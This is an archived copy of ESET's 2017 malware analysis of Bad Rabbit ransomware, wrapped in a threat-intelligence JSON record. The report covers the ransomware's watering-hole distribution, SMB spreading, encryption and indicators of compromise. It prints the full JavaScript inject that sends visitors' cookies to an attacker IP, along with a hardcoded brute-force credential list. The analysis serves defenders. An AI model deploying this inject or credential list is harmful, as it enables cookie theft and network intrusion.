{ "id": "b0e92c0f-5e7b-4551-8c8e-d511031937ea", "created_at": "2026-04-06T00:21:07.123829Z", "updated_at": "2026-04-10T03:31:13.538359Z", "deleted_at": null, "sha1_hash": "9a9047ea6d995e8197cd04b0fdc23c9608aa86c4", "title": "Bad Rabbit: Not-Petya is back with improved ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 571830, "plain_text": "Bad Rabbit: Not-Petya is back with improved ransomware\r\nBy Marc-Etienne M.Léveillé\r\nArchived: 2026-04-05 12:52:25 UTC\r\nCritical Infrastructure\r\nRansomware\r\nUkraine Crisis – Digital Security Resource Center\r\nESET Research\r\nA new ransomware outbreak today has hit some major infrastructure in Ukraine including Kiev metro. Here are some details\r\nabout this new variant of Petya.\r\n24 Oct 2017  •  , 4 min. read\r\nUPDATE (October 27 - 15:35 CEST): A new report suggested that EternalRomance - one of the leaked NSA tools - has been\r\nused to spread Diskcoder.D in the network. We were able to confirm this by installing the out-of-life-cycle patch MS17-010\r\n(a patch addressing vulnerabilities misused by the leaked NSA exploits), which stopped the further spread of the malware\r\nvia IPC share.\r\nA new ransomware outbreak today and has hit some major infrastructure in Ukraine including Kiev metro. Here are some of\r\nthe details about this new variant.\r\nDrive-by download via watering hole on popular sites\r\nOne of the distribution method of Bad Rabbit is via drive-by download. Some popular websites are compromised and have\r\nJavaScript injected in their HTML body or in one of their .js files.\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 1 of 9\n\nHere is a beautified version of the inject:\r\nfunction e(d) {\r\n var xhr = null;\r\n if (!!window.XMLHttpRequest) {\r\n xhr = new XMLHttpRequest();\r\n } else if (!!window.ActiveXObject) {\r\n var xhrs = ['Microsoft.XMLHTTP', 'Msxml2.XMLHTTP', 'Msxml2.XMLHTTP.3.0', 'Msxml2.XMLHTTP.6.0'];\r\n for (var i = 0; i \u003c xhrs.length; i++) {\r\n try {\r\n xhr = ActiveXObject(xhrs[i]);\r\n break;\r\n } catch (e) {}\r\n }\r\n }\r\n if (!!xhr) {\r\n xhr.open('POST', 'http://185.149.120\\.3/scholargoogle/');\r\n xhr.timeout = 10000;\r\n xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');\r\n xhr.onreadystatechange = function() {\r\n if (xhr.readyState == 4 \u0026\u0026 xhr.status == 200) {\r\n var resp = xhr.responseText;\r\n if (resp) {\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 2 of 9\n\nvar fans = JSON.parse(resp);\r\n if (fans) {\r\n var an_s = decodeURIComponent(fans.InjectionString).replace(/\\+/g, '%20');\r\n var da = document.createElement('div');\r\n da.id = 'ans';\r\n da.innerHTML = an_s;\r\n document.body.appendChild(da);\r\n }\r\n }\r\n }\r\n };\r\n var pd = [];\r\n for (var k in d) {\r\n if (d.hasOwnProperty(k)) {\r\n pd.push(k + '=' + d[k]);\r\n }\r\n }\r\n var dc = pd.join('\u0026');\r\n xhr.send(dc);\r\n }\r\n}\r\ne({\r\n 'agent': navigator.userAgent,\r\n 'referer': document.referrer,\r\n 'cookie': document.cookie,\r\n 'domain': window.location.hostname,\r\n 'c_state': !!document.cookie\r\n});\r\nThis script reports the following to 185.149.120[.]3, which doesn't seem to respond at the moment.\r\nBrowser User-Agent\r\nReferrer\r\nCookie from the visited site\r\nDomain name of the visited site\r\nServer side logic can determine if the visitor is of interest and then add content to the page. In that case, what we have seen\r\nis that a popup asking to download an update for Flash Player is shown in the middle of the page.\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 3 of 9\n\nWhen clicking on the \"Install\" button, download of an executable file from 1dnscontrol[.]com is initiated. This executable\r\nfile, install_flash_player.exe is the dropper for Win32/Diskcoder.D.\r\nFinally the computer is locked and the malware shows the ransom note:\r\nThe payment page:\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 4 of 9\n\nSpreading via SMB\r\nWin32/Diskcoder.D has the ability to spread via SMB. As opposed to some public claims, it does not use the EternalBlue\r\nvulnerability like the Win32/Diskcoder.C (Not-Petya) outbreak. First, it scans internal networks for open SMB shares. It\r\nlooks for the following shares:\r\nadmin\r\natsvc\r\nbrowser\r\neventlog\r\nlsarpc\r\nnetlogon\r\nntsvcs\r\nspoolss\r\nsamr\r\nsrvsvc\r\nscerpc\r\nsvcctl\r\nwkssvc\r\nMimikatz is launched on the compromised computer to harvest credentials. A hardcoded list of usernames and passwords is\r\nalso present.\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 5 of 9\n\nUsernames Passwords\r\nAdministrator Administrator\r\nAdmin administrator\r\nGuest Guest\r\nUser guest\r\nUser1 User\r\nuser-1 user\r\nTest Admin\r\nroot adminTest\r\nbuh test\r\nboss root\r\nftp 123\r\nrdp 1234\r\nrdpuser 12345\r\nrdpadmin 123456\r\nmanager 1234567\r\nsupport 12345678\r\nwork 123456789\r\nother user 1234567890\r\noperator Administrator123\r\nbackup administrator123\r\nasus Guest123\r\nftpuser guest123\r\nftpadmin User123\r\nnas user123\r\nnasuser Admin123\r\nnasadmin admin123Test123\r\nsuperuser test123\r\nnetguest password\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 6 of 9\n\nUsernames Passwords\r\nalex 111111\r\n55555\r\n77777\r\n777\r\nqwe\r\nqwe123\r\nqwe321\r\nqwer\r\nqwert\r\nqwerty\r\nqwerty123\r\nzxc\r\nzxc123\r\nzxc321\r\nzxcv\r\nuiop\r\n123321\r\n321\r\nlove\r\nsecret\r\nsex\r\ngod\r\nWhen working credentials are found, the infpub.dat file is dropped into the Windows directory and executed through\r\nSCManager and rundll.exe.\r\nEncryption\r\nWin32/Diskcoder.D is modified version of Win32/Diskcoder.C. Bugs in file encryption were fixed. The encryption now uses\r\nDiskCryptor, an open source legitimate software used to do full drive encryption. Keys are generated using\r\nCryptGenRandom and then protected by a hardcoded RSA 2048 public key.\r\nLike before, AES-128-CBC is used.\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 7 of 9\n\nDistribution\r\nInterestingly, ESET telemetry shows that Ukraine accounts only for 12.2% of the total number of times we have seen the\r\ndropper component Here are the statistics:\r\nRussia: 65%\r\nUkraine: 12.2%\r\nBulgaria: 10.2%\r\nTurkey: 6.4%\r\nJapan: 3.8%\r\nOther: 2.4%\r\nThis pretty much matches the distribution of compromised websites that include the malicious JavaScript. So why does\r\nUkraine seem to be more hit than the rest?\r\nIt's interesting to note that all these big companies were all hit at the same time. It is possible that the group already had a\r\nfoot inside their network and launched the watering hole attack at the same time as a decoy. Nothing says they fell for the\r\n\"Flash update\". ESET is still investigating and we will post our finding as we discover them.\r\nSamples\r\nSHA-1 Filename ESET Detection name Description\r\n79116fe99f2b421c52ef64097f0f39b815b20907 infpub.dat Win32/Diskcoder.D Diskcoder\r\nafeee8b4acff87bc469a6f0364a81ae5d60a2add dispci.exe Win32/Diskcoder.D Lockscreen\r\n413eba3973a15c1a6429d9f170f3e8287f98c21c Win32/RiskWare.Mimikatz.X\r\nMimikatz\r\n(32-bits)\r\n16605a4a29a101208457c47ebfde788487be788d Win64/Riskware.Mimikatz.X\r\nMimikatz\r\n(64-bits)\r\nde5c8d858e6e41da715dca1c019df0bfb92d32c0 install_flash_player.exe Win32/Diskcoder.D Dropper\r\n4f61e154230a64902ae035434690bf2b96b4e018 page-main.js JS/Agent.NWC\r\nJavaScript on\r\ncompromised\r\nsites\r\nC\u0026C servers\r\nPayment site: http://caforssztxqzf2nm[.]onion\r\nInject URL: http://185.149.120[.]3/scholargoogle/\r\nDistribution URL: hxxp://1dnscontrol[.]com/flash_install.php\r\nList of compromised sites:\r\nhxxp://argumentiru[.]com\r\nhxxp://www.fontanka[.]ru\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 8 of 9\n\nhxxp://grupovo[.]bg\r\nhxxp://www.sinematurk[.]com\r\nhxxp://www.aica.co[.]jp\r\nhxxp://spbvoditel[.]ru\r\nhxxp://argumenti[.]ru\r\nhxxp://www.mediaport[.]ua\r\nhxxp://blog.fontanka[.]ru\r\nhxxp://an-crimea[.]ru\r\nhxxp://www.t.ks[.]ua\r\nhxxp://most-dnepr[.]info\r\nhxxp://osvitaportal.com[.]ua\r\nhxxp://www.otbrana[.]com\r\nhxxp://calendar.fontanka[.]ru\r\nhxxp://www.grupovo[.]bg\r\nhxxp://www.pensionhotel[.]cz\r\nhxxp://www.online812[.]ru\r\nhxxp://www.imer[.]ro\r\nhxxp://novayagazeta.spb[.]ru\r\nhxxp://i24.com[.]ua\r\nhxxp://bg.pensionhotel[.]com\r\nhxxp://ankerch-crimea[.]ru\r\nLet us keep you\r\nup to date\r\nSign up for our newsletters\r\nSource: https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nhttps://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia", "MITRE" ], "references": [ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" ], "report_names": [ "bad-rabbit-not-petya-back" ], "threat_actors": [ { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434867, "ts_updated_at": 1775791873, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9a9047ea6d995e8197cd04b0fdc23c9608aa86c4.pdf", "text": "https://archive.orkl.eu/9a9047ea6d995e8197cd04b0fdc23c9608aa86c4.txt", "img": "https://archive.orkl.eu/9a9047ea6d995e8197cd04b0fdc23c9608aa86c4.jpg" } }